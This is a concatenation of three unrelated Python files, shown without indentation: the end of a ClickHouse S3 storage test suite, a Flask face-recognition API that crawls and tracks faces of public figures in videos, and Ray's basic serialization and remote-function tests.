assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["565"]
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3), sum(column4) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500001,500000,0"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
def test_truncate_table(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "truncate"
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
instance.query("TRUNCATE TABLE {}".format(name))
minio = started_cluster.minio_client
timeout = 30
while timeout > 0:
if len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0)
assert instance.query("SELECT * FROM {}".format(name)) == ""
|
server.py | import datetime
import os
import json
import time
from threading import Thread
from flask import Flask, request, jsonify, Response, send_from_directory
from flask_cors import CORS
from flask_restx import Api, Resource
from werkzeug.middleware.proxy_fix import ProxyFix
from src import *
from src.connectors import antract_connector as antract
from src.utils import utils, uri_utils
from bson.json_util import dumps
TRAINING_IMG = 'data/training_img_aligned/'
IMG_DIR = os.path.join(os.getcwd(), TRAINING_IMG)
VIDEO_DIR = os.path.join(os.getcwd(), 'video')
os.makedirs('database', exist_ok=True)
database.init()
flask_app = Flask(__name__)
flask_app.wsgi_app = ProxyFix(flask_app.wsgi_app, x_proto=1, x_port=1, x_for=1, x_host=1, x_prefix=1)
api = Api(app=flask_app,
version="0.1.0",
default='facerec',
title="Face Recognition Api",
description="Recognise celebrities on videos.", )
CORS(flask_app)
PROJECTS = [p for p in os.listdir(TRAINING_IMG) if os.path.isdir(os.path.join(TRAINING_IMG, p))]
project_param = {'description': 'The project context of the call', 'enum': PROJECTS, 'required': True}
def now():
return datetime.datetime.now().isoformat()
@api.route('/projects')
@api.doc(description="Get list of active projects.")
class Projects(Resource):
def get(self):
return jsonify(PROJECTS)
@api.route('/training-set')
@api.doc(description="Get list of training images with classes.",
params={'project': project_param})
class TrainingSet(Resource):
def get(self):
dataset = request.args.get('project', 'general')
folder = os.path.join(TRAINING_IMG, dataset)
labels, paths = utils.fetch_dataset(folder)
results = {}
for path, c in zip(paths, labels):
path = path.replace(TRAINING_IMG, 'training_img_aligned/')
if c not in results:
results[c] = {
'class': c,
'path': [path]
}
else:
results[c]['path'].append(path)
return jsonify(list(results.values()))
# http://127.0.0.1:5000/crawler?project=antract&q=Charles De Gaulle;Vincent Auriol;Pierre Mendès France;Georges Bidault;Guy Mollet;François Mitterrand;Georges Pompidou;Elisabeth II;Konrad Adenauer;Dwight Eisenhower;Nikita Khrouchtchev;Viatcheslav Molotov;Ahmed Ben Bella
# http://127.0.0.1:5000/crawler?project=memad&q=Annastiina Heikkilä;Frans Timmermans;Manfred Weber;Markus Preiss;Ska Keller;Emilie Tran Nguyen;Jan Zahradil;Margrethe Vestager;Nico Cué;Laura Huhtasaari;Asseri Kinnunen
@api.route('/crawler')
@api.doc(
description="Search faces of people in the web to be added to the dataset.",
params={
'q': {
'required': True,
'description': 'The name of the person, or multiple individuals separated by a semicolon, '
'like in "Tom Hanks;Monica Bellucci"'},
'project': project_param
})
class Crawler(Resource):
def get(self):
start_time = time.time()
q = request.args.get('q')
if q is None:
raise ValueError('Missing required parameter: q')
project = request.args.get('project', default='general')
for keyword in q.split(';'):
crawler.main(keyword, max_num=30, project=project)
return jsonify({
'task': 'crawl',
'time': now(),
'execution_time': (time.time() - start_time),
'status': 'ok'
})
@api.route('/train/<string:project>')
@api.doc(description="Trigger the training of the model")
class Training(Resource):
def get(self, project):
start_time = time.time()
classifier.main(classifier='SVM', project=project, discard_disabled="true")
return jsonify({
'task': 'train',
'time': now(),
'execution_time': (time.time() - start_time),
'status': 'ok'
})
# http://127.0.0.1:5000/track?speedup=25&video=video/yle_a-studio_8a3a9588e0f58e1e40bfd30198274cb0ce27984e.mp4
# http://127.0.0.1:5000/track?format=ttl&video=http://data.memad.eu/yle/a-studio/8a3a9588e0f58e1e40bfd30198274cb0ce27984e
@api.route('/track')
@api.doc(description="Extract from the video all the continuous positions of the people in the dataset",
params={
'video': {'required': True, 'description': 'URI of the video to be analysed'},
'project': project_param,
'speedup': {'default': 25, 'type': int,
'description': 'Number of frame to wait between two iterations of the algorithm'},
'no_cache': {'type': bool, 'default': False,
'description': 'Set it if you want to recompute the annotations'},
'format': {'default': 'json', 'enum': ['json', 'ttl'], 'description': 'Set the output format'},
})
class Track(Resource):
def get(self):
video_id = request.args.get('video').strip()
project = request.args.get('project').strip()
speedup = request.args.get('speedup', type=int, default=25)
no_cache = 'no_cache' in request.args.to_dict() and request.args.get('no_cache') != 'false'
video = None
locator = video_id
if not no_cache:
video = database.get_all_about(video_id, project)
if video:
locator = video['locator']
need_run = not video or 'tracks' not in video and video.get('status') != 'RUNNING'
if not video or need_run:
if video_id.startswith('http'): # it is a uri!
locator, video = uri_utils.uri2video(video_id)
video_id = video['locator']
elif not os.path.isfile(video_id):
raise FileNotFoundError('video not found: %s' % video_id)
else:
video = {'locator': video_id}
database.save_metadata(video)
if need_run:
database.clean_analysis(video_id, project)
database.save_status(video_id, project, 'RUNNING')
video['status'] = 'RUNNING'
Thread(target=run_tracker, args=(locator, speedup, video_id, project)).start()
elif 'tracks' in video and len(video['tracks']) > 0:
raw_tracks = clusterize.from_dict(video['tracks'])
video['tracks'] = clusterize.main(raw_tracks, confidence_threshold=0, merge_cluster=True)
assigned_tracks = [t['merged_tracks'] for t in video['tracks']]
if 'feat_clusters' in video:
video['feat_clusters'] = clusterize.unknown_clusterise(video['feat_clusters'], assigned_tracks,
raw_tracks)
if '_id' in video:
del video['_id'] # the database id should not appear on the output
fmt = request.args.get('format')
if fmt == 'ttl':
return Response(semantifier.semantify(video), mimetype='text/turtle')
return jsonify(video)
def run_tracker(video_path, speedup, video, project):
try:
return tracker.main(video_path, project=project, video_speedup=speedup, export_frames=True, video_id=video)
except RuntimeError:
database.save_status(video, project, 'ERROR')
@flask_app.route('/get_locator')
def send_video():
path = request.args.get('video')
if path.startswith('http'):
video_path, info = uri_utils.uri2video(path)
return video_path
else:
return send_from_directory(VIDEO_DIR, path, as_attachment=True)
@flask_app.route('/get_metadata')
def get_metadata():
path = request.args.get('video')
if path.startswith('http://www.ina.fr/'):
return jsonify(antract.get_metadata_for(path)[0])
else:
return None
@flask_app.route('/appearance/<string:person>')
def get_appearances(person):
project = request.args.get('project')
return jsonify(json.loads(dumps(database.get_video_with(person, project))))
@flask_app.route('/training_img_aligned/<path:subpath>')
def send_img(subpath=None):
dirname = os.path.dirname(subpath)
filename = os.path.basename(subpath)
return send_from_directory(os.path.join(IMG_DIR, dirname), filename, as_attachment=True)
@api.route('/disabled/<string:project>')
class Disabled(Resource):
def get(self, project):
DISABLED_FILE = os.path.join(TRAINING_IMG, project, 'disabled.txt')
if not os.path.isfile(DISABLED_FILE):
# automatic disable
return jsonify(classifier.get_outlier_list(project))
with open(DISABLED_FILE) as f:
dis = f.read().split('\n')
return jsonify(dis)
def post(self, project):
data = request.json
DISABLED_FILE = os.path.join(TRAINING_IMG, project, 'disabled.txt')
with open(DISABLED_FILE, 'w') as f:
for x in data:
f.write(x)
f.write('\n')
f.close()
return 'ok'
@api.errorhandler(ValueError)
def handle_invalid_usage(error):
response = jsonify({
'status': 'error',
'error': str(error),
'time': now()
})
response.status_code = 422
return response
if __name__ == '__main__':
flask_app.run()
|
test_basic.py | # coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import glob
import io
import json
import logging
from multiprocessing import Process
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.ray_constants as ray_constants
import ray.tests.cluster_utils
import ray.tests.utils
from ray.tests.utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
def test_simple_serialization(ray_start_regular):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start_regular):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
# Test StringIO serialization
s = io.StringIO(u"Hello, world!\n")
s.seek(0)
line = s.readline()
s.seek(0)
assert ray.get(ray.put(s)).readline() == line
def test_nested_functions(ray_start_regular):
# Make sure that remote functions can use other values that are defined
# after the remote function but before the first function invocation.
@ray.remote
def f():
return g(), ray.get(h.remote())
def g():
return 1
@ray.remote
def h():
return 2
assert ray.get(f.remote()) == (1, 2)
# Test a remote function that recursively calls itself.
@ray.remote
def factorial(n):
if n == 0:
return 1
return n * ray.get(factorial.remote(n - 1))
assert ray.get(factorial.remote(0)) == 1
assert ray.get(factorial.remote(1)) == 1
assert ray.get(factorial.remote(2)) == 2
assert ray.get(factorial.remote(3)) == 6
assert ray.get(factorial.remote(4)) == 24
assert ray.get(factorial.remote(5)) == 120
# Test remote functions that recursively call each other.
@ray.remote
def factorial_even(n):
assert n % 2 == 0
if n == 0:
return 1
return n * ray.get(factorial_odd.remote(n - 1))
@ray.remote
def factorial_odd(n):
assert n % 2 == 1
return n * ray.get(factorial_even.remote(n - 1))
assert ray.get(factorial_even.remote(4)) == 24
assert ray.get(factorial_odd.remote(5)) == 120
def test_ray_recursive_objects(ray_start_regular):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
if ray.worker.USE_NEW_SERIALIZER:
# Serialize the recursive objects.
for obj in recursive_objects:
ray.put(obj)
else:
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start_regular):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start_regular):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(ray_start_regular):
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start_regular):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(ray_start_2_cpus):
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(ray_start_regular):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
